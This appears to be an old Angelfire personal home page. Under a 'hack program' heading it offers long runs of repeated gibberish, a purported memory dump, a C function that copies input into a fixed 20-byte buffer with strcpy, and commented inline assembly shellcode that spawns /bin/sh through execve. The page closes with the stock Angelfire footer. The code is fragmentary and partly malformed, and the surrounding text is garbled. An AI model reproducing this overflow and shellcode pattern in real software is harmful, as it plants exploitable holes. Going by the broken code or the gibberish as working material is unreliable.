***** Hack program sending encrypted commands DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456DFAdgagasfdgAERGAggasdgagdaASGDSAGFFFwwFFVDSDVsVVVsVSF356666666666543437HRrrrrhhhhrhROOTrootROOTadbadfb
badbBBBROOTvasvdvavsvsvaFOUND......graggearVVVVVREQVVQVREQFREVVREQ4444444562456RGREGgwhttwrhHWTRcommand
COMMANDQEGREQRGQGQERGttyyyyyyyygggggggggggggggggrrrrRAGRQggggggggggggggggggggggggggggggggggggggeeerrqqrtqert
0x8049700: s (0x616c62)
0x8049701: e (0x616c)
0x8049702: n (0x61) <---- each of this lines represent a memory address
0x8049703: d (0x0)
0x8049704: (0x0)
0x8049705: (0x0)
0x8049706: (0x0)
0x8049707: (0x0)
0x8049708: (0x0)
0x8049709: (0x19000000)
0x804970a: (0x190000)
0x804970b: (0x1900)
0x804970c: (0x19)
exploit(char *this) {
char string[20];
strcpy(string,this);
printf("%s\n", string);
main(int argc, char *argv[]) {
exploit(argv[1])
"popl %esi \n" //get seved EIP to esi,now we have /bin/sh address
"movl %esi,0x8(%esi) \n" //address of sh behind /bin/sh
"movl $0x0,0xc(%esi) \n" //NULL as 3rd argument goes after sh address
"movb $0x0,0x7(%esi) \n" //terminate /bin/sh with '\0'
"movl %esi,%ebx \n" //address of sh[0] in %ebx
"leal %0x8(%esi),%ecx \n" //address of sh in %ecx(2nd argument)
"leal %0xc(%esi),%edx \n" //address of NULL in %edx(3rd argument)
"movl $0xb,%eax \n" //sys call of execve in %eax
" int $0x80 \n" //kernel mode
" call -0x23 \n" //call popl %esi
" .string \"/bin/sh\" \n"); //our string
My Home Page
My Favorite things about Angelfire.
My Favorite Web Sites
Angelfire - Free Home Pages
Free Web Building Help
Angelfire HTML Library
HTML Gear - free polls, guestbooks, and more!
Thank you for visiting my page at Angelfire.
Please come back and visit again!